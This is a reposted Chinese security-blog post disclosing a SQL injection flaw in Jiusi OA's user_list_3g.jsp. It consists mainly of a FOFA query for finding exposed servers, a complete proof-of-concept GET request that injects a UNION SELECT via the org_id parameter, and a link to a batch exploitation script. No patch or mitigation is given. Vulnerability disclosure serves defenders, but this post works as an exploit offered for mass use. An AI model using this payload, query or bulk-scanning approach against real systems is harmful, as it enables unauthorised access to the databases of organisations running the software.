九思OA软件user_list_3g.jsp存在SQL注入漏洞-附py

admin 2024年3月4日21:58:04评论36 views字数 536阅读1分47秒阅读模式

九思OA软件

一:漏洞描述

九思OA软件user_list_3g.jsp存在SQL注入漏洞

二:网络空间测绘查询

fofa

app="九思软件-OA"

三:漏洞复现

九思OA软件user_list_3g.jsp存在SQL注入漏洞-附py


poc

GET /jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&userNames=1&content=1&org_id=1%20union/**/select/**/1,md5(1)%20%23 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept: */*Connection: Keep-Alive

四:批量脚本获取

九思OA软件user_list_3g.jsp存在SQL注入漏洞-附py

https://github.com/Y1-K1NG/poc_exp/tree/main/20240304%E4%B9%9D%E6%80%9DOA%E8%BD%AF%E4%BB%B6user_list_3g.jsp%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E

原文始发于微信公众号(Yi安全):九思OA软件user_list_3g.jsp存在SQL注入漏洞-附py

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月4日21:58:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   九思OA软件user_list_3g.jsp存在SQL注入漏洞-附pyhttps://cn-sec.com/archives/2546684.html

发表评论

匿名网友 填写信息